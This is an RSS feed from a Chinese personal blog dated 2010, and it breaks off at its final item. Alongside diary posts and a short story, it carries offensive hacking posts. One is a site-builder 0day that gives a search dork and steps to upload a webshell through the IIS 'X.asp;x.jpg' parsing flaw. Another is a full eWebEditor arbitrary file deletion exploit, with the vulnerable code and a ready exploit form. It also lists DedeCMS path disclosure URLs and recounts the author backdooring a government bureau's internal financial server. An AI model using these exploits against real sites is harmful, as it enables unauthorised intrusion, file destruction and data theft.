<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sink.Blog</title>
	<atom:link href="http://www.sink.org.ru/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.sink.org.ru</link>
	<description>不以猥琐惊天下,但求淫荡动世人</description>
	<lastBuildDate>Sun, 23 May 2010 10:32:52 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>现在还真有不要脸的人</title>
		<link>http://www.sink.org.ru/?p=53</link>
		<comments>http://www.sink.org.ru/?p=53#comments</comments>
		<pubDate>Sun, 23 May 2010 10:32:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[乱七八糟]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=53</guid>
		<description><![CDATA[
话说&#8230;从来不买菜的我。今天终于在母亲的狂轰乱炸下帮母亲去菜市场买1次菜。事情就是这样开始的。
在我走的时候因为身上没有零钱。问了我亲爱的妈妈要了2.5元钱去菜市场买1元豆腐和一个茄子。当我匆忙的直接走进
卖豆腐的摊位时候买1元豆腐的时候从兜里掉下在地上了5毛钱。说起来也奇怪我旁边刚好有以为穿着阔气的阿姨刚买完。准备走人。我掉地上的5毛偏偏掉到那位阿姨的脚下。麻痹就在我拣钱的时候阿姨说哪个钱是她掉了。说她刚刚在这里掏钱。还问我我的钱什么掉在她的脚下。我直接吐血了。。。卖豆腐都看到是我掉的。哪个臭不要脸居然说是她掉了。我听到这话只说了句：这钱是我掉的。拿了钱和豆腐不在理哪个不要脸的老女人。然后转身走准备去买茄子。老女人就在身后发话了说：不说了不说了。 操了。搞的老子真的拣了她的钱一样。直接让我着实的郁闷了一天。。。现在这个社会啊。居然还有这么不要脸的人啊！要不是我还准备在买茄子没零钱，貌似我平时掉了5毛钱都不带拣的。。。。哎。。。算我倒霉把~~

]]></description>
			<content:encoded><![CDATA[<div id="blogDetailDiv">
<p><span style="color: #ff00ff;">话说&#8230;从来不买菜的我。今天终于在母亲的狂轰乱炸下帮母亲去菜市场买1次菜。事情就是这样开始的。</span></p>
<p><span style="color: #ff00ff;">在我走的时候因为身上没有零钱。问了我亲爱的妈妈要了2.5元钱去菜市场买1元豆腐和一个茄子。当我匆忙的直接走进</span></p>
<p><span style="color: #ff00ff;">卖豆腐的摊位时候买1元豆腐的时候从兜里掉下在地上了5毛钱。说起来也奇怪我旁边刚好有以为穿着阔气的阿姨刚买完。准备走人。我掉地上的5毛偏偏掉到那位阿姨的脚下。麻痹就在我拣钱的时候阿姨说哪个钱是她掉了。说她刚刚在这里掏钱。还问我我的钱什么掉在她的脚下。我直接吐血了。。。卖豆腐都看到是我掉的。哪个臭不要脸居然说是她掉了。我听到这话只说了句：这钱是我掉的。拿了钱和豆腐不在理哪个不要脸的老女人。然后转身走准备去买茄子。老女人就在身后发话了说：不说了不说了。 操了。搞的老子真的拣了她的钱一样。直接让我着实的郁闷了一天。。。现在这个社会啊。居然还有这么不要脸的人啊！要不是我还准备在买茄子没零钱，貌似我平时掉了5毛钱都不带拣的。。。。哎。。。算我倒霉把~~</span></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=53</wfw:commentRss>
		<slash:comments>12833</slash:comments>
		</item>
		<item>
		<title>24岁女人和30岁男人在情侣包厢里的对话~~~</title>
		<link>http://www.sink.org.ru/?p=49</link>
		<comments>http://www.sink.org.ru/?p=49#comments</comments>
		<pubDate>Thu, 08 Apr 2010 08:25:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[乱七八糟]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=49</guid>
		<description><![CDATA[


晚餐。桌两边，坐了男人和女人。
　
“我喜欢你。”女人一边摆弄着手里的酒杯，一边淡淡地说着。
　
“我有老婆。”男人摸着自己手上的戒指。
“我不在乎，我只想知道，你的感觉。你，喜欢我吗？”
　
男人抬起头，打量着对面的女人。
　
24岁，年轻，有朝气，相当不错的年纪。
　白皙的皮肤，充满活力的身体，一双明亮的，会说话的眼睛。
　真是不错的女孩啊，可惜。
　“如果你也喜欢我，我不介意作你的情人。”女人终于等不下去，追加了一句。
　“我爱我妻子。”男人坚定地回答。
　“你爱她？爱她什么？现在的她，应该已经年老色衰，见不得人了吧。否则，公司的晚宴，怎么从来不见你带她来……”
　女人还想继续，可接触到男人冷冷的目光后，打消了念头。
　静……
　“你喜欢我什么？”男人开口了。
“成熟，稳重，动作举止很有男人味，懂得关心人，很多很多。反正，和我之前见过的人不同，你很特别。”
　“你知道三年前的我什么样子？”男人点了颗烟。
　“不知道。我不在乎，即使你坐过牢。”
　
“三年前，我就是你现在眼里的那些普通男人。”男人没理会女人，继续说。
　“普通大学毕业，工作不顺心，整天喝酒，发脾气。对女孩子爱理不理，还因为去夜总会找小姐，被pol.ice抓过。”
　“那怎么……”女人有了兴趣，想知道是什么让男人转变的。
　“因为她？”
　“嗯。”
　“她那个人，好像总能看到事情的内在。教我很多东西，让我别太计较得失，别太在乎眼前的事，尽量待人和善。那时的我在她面前，就像少不更事的孩子。那时真的很奇怪，倔脾气的我，偏偏最听她的话。按照她说的，接受现实，我知道自己没用，就努力工作。那年年底，工作上稍微有了起色，我们结婚了。”
　
男人弹了弹烟灰，继续说着。
　“那时，真是苦日子。两个人，一张床，家里的家具也少得可怜。知道吗？结婚一年后，我才给她买了第一枚钻戒，存了大半年的钱呢。当然，是背着她存的。若她知道了，是肯定不让的。”
　“那阵子，因为烟酒弄得自己身体不好。大冬天的，她每天晚上睡前还要给我熬汤喝。那味道，也只有她做得出。”
男人沉醉于回忆里，忘记了时间，只是不停地讲述着往事。
而女人，也丝毫没有打断的意思，静静地听着。
等男人注意到时间，已经晚上10点了。
“啊，对不起，没注意时间，已经这么晚了。”男人抱歉地笑了笑。
“现在，你可以理解嘛？我不可能，也不会，做对不起她的事。”
　“啊，知道了。输给这样子的人，心服口服了！”女人无奈地摇了摇头。“不过我到了她的年纪，会更棒的。”
　
“嗯。那就可以找到更好的男人。不是吗？”
　“很晚了，家里的汤要冷了，我送你回去。”男人站起身，想送女人。
　“不了，我自己回去可以了。”女人摆了摆手。“回去吧，别让她等急了。”
　男人会心地笑了笑，转身要走。
　“她漂亮嘛？”
　“……嗯，很美。”
　男人的身影消失在夜色中，留下女人，对着蜡烛，发呆。
　男人回到家，推开门，径直走进卧室，打开了台灯。
　沿着床边，他坐了下来。
“老婆，已经第四个了。干嘛让我变得这么好，好多人喜欢我呀。搞不好，我会变心呀。干吗把我变得这么好，自己却先走了？我，我一个人，好孤单呀……”
男人哽咽地说着，终于泣不成声。
眼泪，一滴滴从男人的脸颊流下，打在手心里的相框上。昏暗的灯光中，旧照片里弥漫着的是已逝女子淡淡的温柔。



]]></description>
			<content:encoded><![CDATA[<table cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td id="postmessage_1739862"><span style="color: #ff00ff;">晚餐。桌两边，坐了男人和女人。<br />
　<br />
“我喜欢你。”女人一边摆弄着手里的酒杯，一边淡淡地说着。<br />
　<br />
“我有老婆。”男人摸着自己手上的戒指。</p>
<p>“我不在乎，我只想知道，你的感觉。你，喜欢我吗？”<br />
　<br />
男人抬起头，打量着对面的女人。<br />
　<br />
24岁，年轻，有朝气，相当不错的年纪。</p>
<p>　白皙的皮肤，充满活力的身体，一双明亮的，会说话的眼睛。</p>
<p>　真是不错的女孩啊，可惜。</p>
<p>　“如果你也喜欢我，我不介意作你的情人。”女人终于等不下去，追加了一句。</p>
<p>　“我爱我妻子。”男人坚定地回答。</p>
<p>　“你爱她？爱她什么？现在的她，应该已经年老色衰，见不得人了吧。否则，公司的晚宴，怎么从来不见你带她来……”</p>
<p>　女人还想继续，可接触到男人冷冷的目光后，打消了念头。</p>
<p>　静……</p>
<p>　“你喜欢我什么？”男人开口了。</p>
<p>“成熟，稳重，动作举止很有男人味，懂得关心人，很多很多。反正，和我之前见过的人不同，你很特别。”</p>
<p>　“你知道三年前的我什么样子？”男人点了颗烟。</p>
<p>　“不知道。我不在乎，即使你坐过牢。”<br />
　<br />
“三年前，我就是你现在眼里的那些普通男人。”男人没理会女人，继续说。</p>
<p>　“普通大学毕业，工作不顺心，整天喝酒，发脾气。对女孩子爱理不理，还因为去夜总会找小姐，被pol.ice抓过。”</p>
<p>　“那怎么……”女人有了兴趣，想知道是什么让男人转变的。</p>
<p>　“因为她？”</p>
<p>　“嗯。”</p>
<p>　“她那个人，好像总能看到事情的内在。教我很多东西，让我别太计较得失，别太在乎眼前的事，尽量待人和善。那时的我在她面前，就像少不更事的孩子。那时真的很奇怪，倔脾气的我，偏偏最听她的话。按照她说的，接受现实，我知道自己没用，就努力工作。那年年底，工作上稍微有了起色，我们结婚了。”<br />
　<br />
男人弹了弹烟灰，继续说着。</p>
<p>　“那时，真是苦日子。两个人，一张床，家里的家具也少得可怜。知道吗？结婚一年后，我才给她买了第一枚钻戒，存了大半年的钱呢。当然，是背着她存的。若她知道了，是肯定不让的。”</p>
<p>　“那阵子，因为烟酒弄得自己身体不好。大冬天的，她每天晚上睡前还要给我熬汤喝。那味道，也只有她做得出。”</p>
<p>男人沉醉于回忆里，忘记了时间，只是不停地讲述着往事。</p>
<p>而女人，也丝毫没有打断的意思，静静地听着。</p>
<p>等男人注意到时间，已经晚上10点了。</p>
<p>“啊，对不起，没注意时间，已经这么晚了。”男人抱歉地笑了笑。</p>
<p>“现在，你可以理解嘛？我不可能，也不会，做对不起她的事。”</p>
<p>　“啊，知道了。输给这样子的人，心服口服了！”女人无奈地摇了摇头。“不过我到了她的年纪，会更棒的。”<br />
　<br />
“嗯。那就可以找到更好的男人。不是吗？”<br />
　“很晚了，家里的汤要冷了，我送你回去。”男人站起身，想送女人。<br />
　“不了，我自己回去可以了。”女人摆了摆手。“回去吧，别让她等急了。”<br />
　男人会心地笑了笑，转身要走。<br />
　“她漂亮嘛？”<br />
　“……嗯，很美。”<br />
　男人的身影消失在夜色中，留下女人，对着蜡烛，发呆。<br />
　男人回到家，推开门，径直走进卧室，打开了台灯。<br />
　沿着床边，他坐了下来。</p>
<p>“老婆，已经第四个了。干嘛让我变得这么好，好多人喜欢我呀。搞不好，我会变心呀。干吗把我变得这么好，自己却先走了？我，我一个人，好孤单呀……”<br />
男人哽咽地说着，终于泣不成声。</p>
<p>眼泪，一滴滴从男人的脸颊流下，打在手心里的相框上。昏暗的灯光中，旧照片里弥漫着的是已逝女子淡淡的温柔。</span></td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=49</wfw:commentRss>
		<slash:comments>843</slash:comments>
		</item>
		<item>
		<title>九天自助建站系统 0day</title>
		<link>http://www.sink.org.ru/?p=45</link>
		<comments>http://www.sink.org.ru/?p=45#comments</comments>
		<pubDate>Thu, 08 Apr 2010 01:58:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=45</guid>
		<description><![CDATA[关键字：
inurl:/reg_TemletSel.asp?step=2
或者
电子商务自助建站&#8211;您理想的助手
利用方法：
1）注册
2）网站管理&#8212;资源管理&#8212;上传X.asp;x.jpg
3)拿到webshell
特殊情况：
1）强制改名
2）iis解析漏洞被修补，不能解析X.asp;x.jpg
]]></description>
			<content:encoded><![CDATA[<p>关键字：<br />
inurl:/reg_TemletSel.asp?step=2<br />
或者<br />
电子商务自助建站&#8211;您理想的助手</p>
<p>利用方法：<br />
1）注册<br />
2）网站管理&#8212;资源管理&#8212;上传X.asp;x.jpg<br />
3)拿到webshell</p>
<p>特殊情况：<br />
1）强制改名<br />
2）iis解析漏洞被修补，不能解析X.asp;x.jpg</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=45</wfw:commentRss>
		<slash:comments>148</slash:comments>
		</item>
		<item>
		<title>坐在后排的太杯具了&#8230;</title>
		<link>http://www.sink.org.ru/?p=39</link>
		<comments>http://www.sink.org.ru/?p=39#comments</comments>
		<pubDate>Sun, 04 Apr 2010 14:42:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[影音娱乐]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=39</guid>
		<description><![CDATA[
]]></description>
			<content:encoded><![CDATA[<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="399" height="351" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://player.youku.com/player.php/sid/XMTAwOTc2ODQw/v.swf" /><embed type="application/x-shockwave-flash" width="399" height="351" src="http://player.youku.com/player.php/sid/XMTAwOTc2ODQw/v.swf"></embed></object><a href="http://player.youku.com/player.php/sid/XMTAwOTc2ODQw/v.swf"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=39</wfw:commentRss>
		<slash:comments>121</slash:comments>
		</item>
		<item>
		<title>自己的梦想和现实</title>
		<link>http://www.sink.org.ru/?p=37</link>
		<comments>http://www.sink.org.ru/?p=37#comments</comments>
		<pubDate>Sun, 04 Apr 2010 13:41:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[心情随笔]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=37</guid>
		<description><![CDATA[




         已经是春天的今天居然下起了小雪。在外漂泊的这几年什么都没有混出来。又狼狈的回到了自己出生的地方。和小时候自己的理想已经发生巨大的偏差。从小自己就想着长大以后一定要做一个世俗人。根本从没有为了自己的衣食发愁。也从来没有考虑到这个方面。做为一个有着成为俗人的梦想从来就没想过自己长大了会为基本生活发愁。怀揣这坚定的信念加上没有能力的我，直接被现实打击体无完肤。我不甘心。我好不甘心。我就不相信自己不能够成为一个俗人。可是现在越来和自己的想法偏离了。3个月后真的进入国家单位为自己的后半生做了混日子的准备。到那个时候不知道我从小的信念和梦想是否依然存在。
注解：俗人是指有钱人





]]></description>
			<content:encoded><![CDATA[<table>
<tbody>
<tr>
<td>
<div id="blog_text">
<p>         <span style="font-family: 隶书; color: #134f5c; font-size: medium;">已经是春天的今天居然下起了小雪。在外漂泊的这几年什么都没有混出来。又狼狈的回到了自己出生的地方。和小时候自己的理想已经发生巨大的偏差。从小自己就想着长大以后一定要做一个世俗人。根本从没有为了自己的衣食发愁。也从来没有考虑到这个方面。做为一个有着成为俗人的梦想从来就没想过自己长大了会为基本生活发愁。怀揣这坚定的信念加上没有能力的我，直接被现实打击体无完肤。我不甘心。我好不甘心。我就不相信自己不能够成为一个俗人。可是现在越来和自己的想法偏离了。3个月后真的进入国家单位为自己的后半生做了混日子的准备。到那个时候不知道我从小的信念和梦想是否依然存在。</span></p>
<p><span style="font-family: 隶书; color: #ff0000; font-size: medium;">注解：俗人是指有钱人</span></p>
</div>
</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=37</wfw:commentRss>
		<slash:comments>104</slash:comments>
		</item>
		<item>
		<title>一个conn.asp脚本木马给我带来的灾难</title>
		<link>http://www.sink.org.ru/?p=34</link>
		<comments>http://www.sink.org.ru/?p=34#comments</comments>
		<pubDate>Sun, 04 Apr 2010 13:39:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[心情随笔]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=34</guid>
		<description><![CDATA[几天前拿到xx省xx市的到矿物局站点.当要进一步扩大战果的时候在内部网络发现他们存在内部站点。没费多少工夫留到一个简单的上传shell后门到他们内部网络。准备以后随时渗透内部网络.然后退出.开始分析网络内部结构.最后搞明白.原来是国内中型企业b类ip. 划分比较细致.每个局都存在vlan.规模比较大.ip段也比较多.在分析出原来我留后门的内部服务器是他们其中的一个数据服务器.经分析貌似是企业几万人的财务数据服务器。&#60;我上去也证实了着一点&#62;吓死偶了.如果服务器出问题了。那我肯定玩完.没敢在进行下一步的动作.就此停止了渗透工作.经过几天的思想斗争.既然都进来了.还是在上去看一下.终于忍耐不住动手了.连接到内部网络.找到内部站点留下的小shell 准备传一个大马上去.当时因为在别人机器上就匆匆的在t00ls里找到了一个大马&#60;地址:http://www.t00ls.net/thread-5364-1-2.html&#62;就没太在心下下来.直接上传.因为此大马名称居然是一般站点的数据库连接配置文件.conn.asp 我就传上去了.一传上去.出现问题了.内部站点立刻开不开了.自己惊了.肯定是覆盖了人家的数据库连接文件.自己真没想到这么倒霉.立刻从新写了数据连接配置文件传上去.结果站点已经开不开.我在怎么修改都是站点处于维护中&#8230; 完了.此时我心沉入谷底一样的担心.这样很容易被管理员发现的.如果被管理员发现我是否就玩完了.苍茫中.我收拾战局立刻走人&#8230;&#8230; 然后就是整天心神不定的。指不定那一下人家警察就来找上我了&#8230;&#8230;..哎&#8230; 怪自己懒了一下没有从新修改名字.当时自己已经知道文件名是conn 可是还是因为自己懒的原因差点让自己玩完&#8230;..至此我也停止了继续扩大战果的想法.已经停止了一切对人家安全检测的想法&#8230;.所有写了这片文章给自己提一个醒.以后要处处小心&#8230;..
]]></description>
			<content:encoded><![CDATA[<p><span style="color: #008080;">几天前拿到xx省xx市的到矿物局站点.当要进一步扩大战果的时候在内部网络发现他们存在内部站点。没费多少工夫留到一个简单的上传shell后门到他们内部网络。准备以后随时渗透内部网络.然后退出.开始分析网络内部结构.最后搞明白.原来是国内中型企业b类ip. 划分比较细致.每个局都存在vlan.规模比较大.ip段也比较多.在分析出原来我留后门的内部服务器是他们其中的一个数据服务器.经分析貌似是企业几万人的财务数据服务器。&lt;我上去也证实了着一点&gt;吓死偶了.如果服务器出问题了。那我肯定玩完.没敢在进行下一步的动作.就此停止了渗透工作.经过几天的思想斗争.既然都进来了.还是在上去看一下.终于忍耐不住动手了.连接到内部网络.找到内部站点留下的小shell 准备传一个大马上去.当时因为在别人机器上就匆匆的在t00ls里找到了一个大马&lt;地址:http://www.t00ls.net/thread-5364-1-2.html&gt;就没太在心下下来.直接上传.因为此大马名称居然是一般站点的数据库连接配置文件.conn.asp 我就传上去了.一传上去.出现问题了.内部站点立刻开不开了.自己惊了.肯定是覆盖了人家的数据库连接文件.自己真没想到这么倒霉.立刻从新写了数据连接配置文件传上去.结果站点已经开不开.我在怎么修改都是站点处于维护中&#8230; 完了.此时我心沉入谷底一样的担心.这样很容易被管理员发现的.如果被管理员发现我是否就玩完了.苍茫中.我收拾战局立刻走人&#8230;&#8230; 然后就是整天心神不定的。指不定那一下人家警察就来找上我了&#8230;&#8230;..哎&#8230; 怪自己懒了一下没有从新修改名字.当时自己已经知道文件名是conn 可是还是因为自己懒的原因差点让自己玩完&#8230;..至此我也停止了继续扩大战果的想法.已经停止了一切对人家安全检测的想法&#8230;.所有写了这片文章给自己提一个醒.以后要处处小心&#8230;..</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=34</wfw:commentRss>
		<slash:comments>88</slash:comments>
		</item>
		<item>
		<title>Ewebeditor2.8.0最终版删除任意文件漏洞</title>
		<link>http://www.sink.org.ru/?p=30</link>
		<comments>http://www.sink.org.ru/?p=30#comments</comments>
		<pubDate>Sun, 04 Apr 2010 12:52:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=30</guid>
		<description><![CDATA[来源：http://www.oldjun.com/blog/index.php/archives/40/
这个漏洞可以很鸡肋，也可以很致命，关键看你怎么利用！
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入，看这些代码：

&#8216; 把带&#8221;&#124;&#8221;的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, &#8220;&#124;&#8221;)
&#8216; 删除新闻相关的文件，从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
&#8216; 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next

而aSavePathFileName是前面从数据库取出来的：

sSavePathFileName = oRs(&#8220;D_SavePathFileName&#8221;)

看看D_SavePathFileName是怎么添加到数据库里的，在addsave.asp(modifysave.asp)里：

sSavePathFileName = GetSafeStr(Request.Form(&#8220;d_savepathfilename&#8221;))
oRs(&#8220;D_SavePathFileName&#8221;) = sSavePathFileName

居然过滤了，是GetSafeStr函数，再看看这个函数，在Startup.asp里：

Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), &#8220;&#8216;&#8221;, &#8220;&#8221;), Chr(34), &#8220;&#8221;), &#8220;;&#8221;, &#8220;&#8221;)
End Function

无语，这不是过滤字符型注入的函数么？放这里什么用也没有啊！既然路径没有过滤，那就可以直接定义了，构造一个提交页面，其中d_savepathfilename自己任意赋值(要删除多个文件，用&#124;隔开即可)。试试../../eWebEditor.asp，提交后删除该新闻，于是主目录下的eWebEditor.asp不见了！
下面给出利用的htm：

&#60;HTML&#62;&#60;HEAD&#62;&#60;TITLE&#62;eWebEditor删除文件 by:oldjun([url]http://www.oldjun.com[/url])&#60;/TITLE&#62;
&#60;style&#62;body,p,td,input {font-size:9pt}&#60;/style&#62;
&#60;/HEAD&#62;&#60;BODY&#62;&#60;a href=&#8217;list.asp&#8217;&#62;新闻列表&#60;/a&#62; &#124; &#60;a href=&#8217;add.asp&#8217;&#62;增加新闻&#60;/a&#62;
&#60;b&#62;增加新闻&#60;/b&#62;
&#60;form action=&#8221;http://127.0.0.1/editor/Example/NewsSystem/addsave.asp&#8221;
method=&#8221;post&#8221; name=&#8221;myform&#8221;&#62;
    &#60;input type=hidden name=d_originalfilename&#62;
    &#60;input type=hidden name=d_savefilename&#62;
    &#60;table cellspacing=3 align=center&#62;
&#60;tr&#62;&#60;td&#62;要删的文件(相对路径就可以了)：&#60;/td&#62;
&#60;td&#62;&#60;input type=&#8221;text&#8221; name=&#8221;d_savepathfilename&#8221; value=&#8221;" size=&#8221;90&#8243;&#62;&#60;/td&#62;
&#60;/tr&#62;
&#60;tr&#62;&#60;td&#62;新闻标题(随便填)：&#60;/td&#62;
&#60;td&#62;&#60;input [...]]]></description>
			<content:encoded><![CDATA[<p>来源：<a href="http://www.oldjun.com/blog/index.php/archives/40/" target="_blank">http://www.oldjun.com/blog/index.php/archives/40/</a></p>
<p>这个漏洞可以很鸡肋，也可以很致命，关键看你怎么利用！</p>
<p>此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入，看这些代码：</p>
<div>
<blockquote><p>&#8216; 把带&#8221;|&#8221;的字符串转为数组<br />
Dim aSavePathFileName<br />
aSavePathFileName = Split(sSavePathFileName, &#8220;|&#8221;)<br />
&#8216; 删除新闻相关的文件，从文件夹中<br />
Dim i<br />
For i = 0 To UBound(aSavePathFileName)<br />
&#8216; 按路径文件名删除文件<br />
Call DoDelFile(aSavePathFileName(i))<br />
Next</p></blockquote>
</div>
<p>而aSavePathFileName是前面从数据库取出来的：</p>
<div>
<blockquote><p>sSavePathFileName = oRs(&#8220;D_SavePathFileName&#8221;)</p></blockquote>
</div>
<p>看看D_SavePathFileName是怎么添加到数据库里的，在addsave.asp(modifysave.asp)里：</p>
<div>
<blockquote><p>sSavePathFileName = GetSafeStr(Request.Form(&#8220;d_savepathfilename&#8221;))<br />
oRs(&#8220;D_SavePathFileName&#8221;) = sSavePathFileName</p></blockquote>
</div>
<p>居然过滤了，是GetSafeStr函数，再看看这个函数，在Startup.asp里：</p>
<div>
<blockquote><p>Function GetSafeStr(str)<br />
GetSafeStr = Replace(Replace(Replace(Trim(str), &#8220;&#8216;&#8221;, &#8220;&#8221;), Chr(34), &#8220;&#8221;), &#8220;;&#8221;, &#8220;&#8221;)<br />
End Function</p></blockquote>
</div>
<p>无语，这不是过滤字符型注入的函数么？放这里什么用也没有啊！既然路径没有过滤，那就可以直接定义了，构造一个提交页面，其中d_savepathfilename自己任意赋值(要删除多个文件，用|隔开即可)。试试../../eWebEditor.asp，提交后删除该新闻，于是主目录下的eWebEditor.asp不见了！</p>
<p>下面给出利用的htm：</p>
<ol>
<li>&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;eWebEditor删除文件 by:oldjun([url]http://www.oldjun.com[/url])&lt;/TITLE&gt;</li>
<li>&lt;style&gt;body,p,td,input {font-size:9pt}&lt;/style&gt;</li>
<li>&lt;/HEAD&gt;&lt;BODY&gt;&lt;a href=&#8217;list.asp&#8217;&gt;新闻列表&lt;/a&gt; | &lt;a href=&#8217;add.asp&#8217;&gt;增加新闻&lt;/a&gt;</li>
<li>&lt;b&gt;增加新闻&lt;/b&gt;</li>
<li>&lt;form action=&#8221;http://127.0.0.1/editor/Example/NewsSystem/addsave.asp&#8221;</li>
<li>method=&#8221;post&#8221; name=&#8221;myform&#8221;&gt;</li>
<li>    &lt;input type=hidden name=d_originalfilename&gt;</li>
<li>    &lt;input type=hidden name=d_savefilename&gt;</li>
<li>    &lt;table cellspacing=3 align=center&gt;</li>
<li>&lt;tr&gt;&lt;td&gt;要删的文件(相对路径就可以了)：&lt;/td&gt;</li>
<li>&lt;td&gt;&lt;input type=&#8221;text&#8221; name=&#8221;d_savepathfilename&#8221; value=&#8221;" size=&#8221;90&#8243;&gt;&lt;/td&gt;</li>
<li>&lt;/tr&gt;</li>
<li>&lt;tr&gt;&lt;td&gt;新闻标题(随便填)：&lt;/td&gt;</li>
<li>&lt;td&gt;&lt;input type=&#8221;text&#8221; name=&#8221;d_title&#8221; value=&#8221;" size=&#8221;90&#8243;&gt;&lt;/td&gt;</li>
<li>&lt;/tr&gt;</li>
<li>&lt;tr&gt;&lt;td&gt;标题图片：&lt;/td&gt;</li>
<li>&lt;td&gt;&lt;select name=&#8221;d_picture&#8221; size=1&gt;&lt;option value=&#8221;&gt;无&lt;/option&gt;&lt;/select&gt;</li>
<li>当编辑区有插入图片时，将自动填充此下拉框&lt;/td&gt;</li>
<li>&lt;/tr&gt;</li>
<li>&lt;tr&gt;&lt;td&gt;新闻内容(随便填)：&lt;/td&gt;</li>
<li>&lt;td&gt;&lt;textarea name=&#8221;d_content&#8221;&gt;&lt;/textarea&gt;&lt;/td&gt;</li>
<li>&lt;/tr&gt;</li>
<li>&lt;/table&gt;</li>
<li>&lt;input type=submit name=btnSubmit value=&#8221; 提 交 &#8220;&gt;</li>
<li>&lt;input type=reset name=btnReset value=&#8221; 重 填 &#8220;&gt;</li>
<li>&lt;/form&gt;</li>
<li>&lt;/BODY&gt;&lt;/HTML&gt;</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=30</wfw:commentRss>
		<slash:comments>101</slash:comments>
		</item>
		<item>
		<title>清凉网站后台扫描工具V2.0 新增自定义字典导入功能</title>
		<link>http://www.sink.org.ru/?p=24</link>
		<comments>http://www.sink.org.ru/?p=24#comments</comments>
		<pubDate>Sun, 04 Apr 2010 12:45:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工具收集]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=24</guid>
		<description><![CDATA[下载地址:scanweb
]]></description>
			<content:encoded><![CDATA[<p>下载地址:<a href="http://www.sink.org.ru/wp-content/uploads/2010/04/scanweb.zip">scanweb</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=24</wfw:commentRss>
		<slash:comments>6902</slash:comments>
		</item>
		<item>
		<title>DEDECMS5.5暴路径漏洞</title>
		<link>http://www.sink.org.ru/?p=20</link>
		<comments>http://www.sink.org.ru/?p=20#comments</comments>
		<pubDate>Sat, 03 Apr 2010 14:09:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=20</guid>
		<description><![CDATA[www.xxx.cn/plus/task/dede-upcache.php
在网站后面加上plus/task/dede-upcache.php
就能暴出网站路径但是没什么利用价值。
plus/paycenter/nps/config_pay_nps.php
plus/task/dede-optimize-table.php
plus/task/dede-maketimehtml.php
官方也存在这样的漏洞速度去暴暴
]]></description>
			<content:encoded><![CDATA[<div id="blog_text"><a href="http://www.xxx.cn/plus/task/dede-upcache.php" target="_blank">www.xxx.cn/plus/task/dede-upcache.php</a></p>
<p>在网站后面加上plus/task/dede-upcache.php<br />
就能暴出网站路径但是没什么利用价值。<br />
plus/paycenter/nps/config_pay_nps.php<br />
plus/task/dede-optimize-table.php<br />
plus/task/dede-maketimehtml.php</p>
<p>官方也存在这样的漏洞速度去暴暴</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.sink.org.ru/?feed=rss2&amp;p=20</wfw:commentRss>
		<slash:comments>19962</slash:comments>
		</item>
		<item>
		<title>W78企业ASP网站管理系统V1.1的SQL注入</title>
		<link>http://www.sink.org.ru/?p=17</link>
		<comments>http://www.sink.org.ru/?p=17#comments</comments>
		<pubDate>Sat, 03 Apr 2010 14:06:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.sink.org.ru/?p=17</guid>
		<description><![CDATA[W78企业ASP网站管理系统V1.1的SQL注入
